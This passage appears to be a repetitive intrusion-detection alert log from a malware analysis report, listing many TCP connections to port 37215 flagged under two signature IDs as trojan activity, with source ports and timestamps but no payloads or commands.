                SID:2829579
                Source Port:47424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.125290
                SID:2829579
                Source Port:35656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873504
                SID:2829579
                Source Port:59140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.184437
                SID:2835222
                Source Port:48320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440696
                SID:2835222
                Source Port:33624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.414953
                SID:2829579
                Source Port:38880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364805
                SID:2835222
                Source Port:34010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210699
                SID:2829579
                Source Port:39068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.434968
                SID:2835222
                Source Port:52478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.532333
                SID:2835222
                Source Port:36454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.215764
                SID:2829579
                Source Port:43006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.389069
                SID:2829579
                Source Port:60900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893397
                SID:2835222
                Source Port:44114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764994
                SID:2829579
                Source Port:60898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.830757
                SID:2835222
                Source Port:35746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223938
                SID:2829579
                Source Port:59852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.510203
                SID:2835222
                Source Port:45860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.318001
                SID:2829579
                Source Port:47840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597195
                SID:2835222
                Source Port:55952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.515572
                SID:2829579
                Source Port:53474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071632
                SID:2829579
                Source Port:41284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782784
                SID:2835222
                Source Port:38966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.820694
                SID:2829579
                Source Port:33682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.000790
                SID:2829579
                Source Port:55292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631535
                SID:2829579
                Source Port:49370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.694616
                SID:2835222
                Source Port:48226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385446
                SID:2829579
                Source Port:37826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573187
                SID:2835222
                Source Port:49348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763594
                SID:2835222
                Source Port:47958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660878
                SID:2835222
                Source Port:59536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928857
                SID:2829579
                Source Port:60326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113067
                SID:2829579
                Source Port:57650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.919921
                SID:2829579
                Source Port:44794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.986026
                SID:2829579
                Source Port:55464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688251
                SID:2829579
                Source Port:52788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141283
                SID:2829579
                Source Port:59512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.448601
                SID:2835222
                Source Port:34806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.786799
                SID:2835222
                Source Port:45394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287734
                SID:2835222
                Source Port:34386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.910928
                SID:2835222
                Source Port:51434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.526632
                SID:2835222
                Source Port:58192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.129086
                SID:2835222
                Source Port:45092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.184241
                SID:2835222
                Source Port:42294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574877
                SID:2829579
                Source Port:35242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026774
                SID:2829579
                Source Port:47824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.462776
                SID:2835222
                Source Port:40462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897026
                SID:2835222
                Source Port:45472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329237
                SID:2829579
                Source Port:59792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.984952
                SID:2829579
                Source Port:33706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.100369
                SID:2835222
                Source Port:33852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903028
                SID:2835222
                Source Port:59430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.522079
                SID:2835222
                Source Port:57750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.074518
                SID:2829579
                Source Port:34736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207989
                SID:2829579
                Source Port:35842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931534
                SID:2835222
                Source Port:38744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.452060
                SID:2835222
                Source Port:45676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.640348
                SID:2829579
                Source Port:34384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287638
                SID:2835222
                Source Port:57458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.898356
                SID:2835222
                Source Port:51576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141147
                SID:2835222
                Source Port:60772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.929800
                SID:2829579
                Source Port:48624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.236595
                SID:2829579
                Source Port:52452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463175
                SID:2829579
                Source Port:43402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731976
                SID:2829579
                Source Port:51524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.567421
                SID:2829579
                Source Port:51298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.232469
                SID:2829579
                Source Port:38706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.799369
                SID:2829579
                Source Port:59856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042441
                SID:2829579
                Source Port:55162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.622934
                SID:2829579
                Source Port:60608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653365
                SID:2829579
                Source Port:48712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.532068
                SID:2835222
                Source Port:45274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.499802
                SID:2835222
                Source Port:54090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783515
                SID:2835222
                Source Port:32846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660080
                SID:2829579
                Source Port:54672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.100968
                SID:2829579
                Source Port:53108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.628915
                SID:2829579
                Source Port:45614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631279
                SID:2835222
                Source Port:59716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914030
                SID:2835222
                Source Port:37194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.375256
                SID:2829579
                Source Port:49512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.069699
                SID:2829579
                Source Port:42262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.711523
                SID:2829579
                Source Port:56532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.970039
                SID:2835222
                Source Port:59160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.729471
                SID:2835222
                Source Port:37456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321052
                SID:2829579
                Source Port:33194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981304
                SID:2829579
                Source Port:59266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.224007
                SID:2835222
                Source Port:46842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.727255
                SID:2829579
                Source Port:55852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.031475
                SID:2829579
                Source Port:52538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947723
                SID:2829579
                Source Port:56290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.505152
                SID:2829579
                Source Port:46952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763020
                SID:2835222
                Source Port:52796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.799554
                SID:2835222
                Source Port:41382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.222142
                SID:2829579
                Source Port:48390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509802
                SID:2829579
                Source Port:35128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.847090
                SID:2835222
                Source Port:41054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.137869
                SID:2829579
                Source Port:58998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675295
                SID:2829579
                Source Port:48400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655153
                SID:2835222
                Source Port:37596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766192
                SID:2829579
                Source Port:57184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.500462
                SID:2829579
                Source Port:33874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.913784
                SID:2829579
                Source Port:60860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.384454
                SID:2829579
                Source Port:60720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265798
                SID:2829579
                Source Port:41182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076277
                SID:2829579
                Source Port:39558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231243
                SID:2829579
                Source Port:42836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.960579
                SID:2835222
                Source Port:51736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.460604
                SID:2835222
                Source Port:57744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782896
                SID:2835222
                Source Port:39448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032836
                SID:2835222
                Source Port:46702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.776370
                SID:2829579
                Source Port:42176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.940932
                SID:2829579
                Source Port:40984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265514
                SID:2835222
                Source Port:50216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.733546
                SID:2835222
                Source Port:39890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.978732
                SID:2829579
                Source Port:41378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903760
                SID:2829579
                Source Port:38372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.108949
                SID:2835222
                Source Port:40028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276830
                SID:2829579
                Source Port:53374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873261
                SID:2829579
                Source Port:59128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.929460
                SID:2835222
                Source Port:41990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.228408
                SID:2835222
                Source Port:38990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.264834
                SID:2835222
                Source Port:49476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.160141
                SID:2829579
                Source Port:53742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669558
                SID:2829579
                Source Port:39432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.738406
                SID:2829579
                Source Port:48272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665525
                SID:2829579
                Source Port:45206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.950094
                SID:2835222
                Source Port:39450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.814472
                SID:2829579
                Source Port:47160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.963093
                SID:2835222
                Source Port:39984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870385
                SID:2835222
                Source Port:60452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.925966
                SID:2835222
                Source Port:43550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909344
                SID:2835222
                Source Port:43388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.065372
                SID:2835222
                Source Port:53876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024507
                SID:2835222
                Source Port:53326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.802945
                SID:2829579
                Source Port:36262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.585072
                SID:2835222
                Source Port:41032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.526914
                SID:2835222
                Source Port:53510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169612
                SID:2835222
                Source Port:58422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.137094
                SID:2829579
                Source Port:54428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075287
                SID:2835222
                Source Port:42024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555714
                SID:2835222
                Source Port:53490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990734
                SID:2829579
                Source Port:45262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.935724
                SID:2835222
                Source Port:47578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.683812
                SID:2835222
                Source Port:48622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.708560
                SID:2829579
                Source Port:33540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.060548
                SID:2835222
                Source Port:33702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.931989
                SID:2829579
                Source Port:35288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.338858
                SID:2829579
                Source Port:50794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.358739
                SID:2829579
                Source Port:44616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.810949
                SID:2835222
                Source Port:53752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.762801
                SID:2835222
                Source Port:42562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.475034
                SID:2829579
                Source Port:53050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.934230
                SID:2829579
                Source Port:40418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.717989
                SID:2835222
                Source Port:54166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900279
                SID:2835222
                Source Port:59384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.518314
                SID:2835222
                Source Port:48014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226761
                SID:2835222
                Source Port:56966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463570
                SID:2829579
                Source Port:37066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.240045
                SID:2835222
                Source Port:44446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.810847
                SID:2835222
                Source Port:57070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784510
                SID:2829579
                Source Port:38336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.160973
                SID:2835222
                Source Port:52962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.611272
                SID:2835222
                Source Port:43722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.556889
                SID:2829579
                Source Port:49622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.688838
                SID:2835222
                Source Port:53634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.029779
                SID:2835222
                Source Port:46118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.040651
                SID:2835222
                Source Port:53154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.174935
                SID:2829579
                Source Port:50338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.240258
                SID:2829579
                Source Port:38660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.656045
                SID:2829579
                Source Port:33970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.876178
                SID:2835222
                Source Port:48546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417601
                SID:2829579
                Source Port:46104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.261812
                SID:2829579
                Source Port:33822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.175569
                SID:2835222
                Source Port:44640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.776812
                SID:2835222
                Source Port:54202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766931
                SID:2835222
                Source Port:56260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.728524
                SID:2835222
                Source Port:60984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.968433
                SID:2835222
                Source Port:59628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.515767
                SID:2835222
                Source Port:52658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.725329
                SID:2829579
                Source Port:51064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175513
                SID:2829579
                Source Port:52394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.386162
                SID:2835222
                Source Port:35082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001923
                SID:2835222
                Source Port:57980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.576028
                SID:2829579
                Source Port:36284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902104
                SID:2829579
                Source Port:57978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.027360
                SID:2835222
                Source Port:40342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614787
                SID:2835222
                Source Port:48360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663681
                SID:2835222
                Source Port:55630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.897770
                SID:2835222
                Source Port:41810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815540
                SID:2829579
                Source Port:44278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.225634
                SID:2835222
                Source Port:56982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659784
                SID:2835222
                Source Port:49306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.507298
                SID:2835222
                Source Port:41740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.564734
                SID:2835222
                Source Port:40262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.226616
                SID:2829579
                Source Port:37826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.575431
                SID:2835222
                Source Port:52366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.286906
                SID:2829579
                Source Port:57050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782552
                SID:2835222
                Source Port:43908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361683
                SID:2835222
                Source Port:35344
                Destination Port:37215
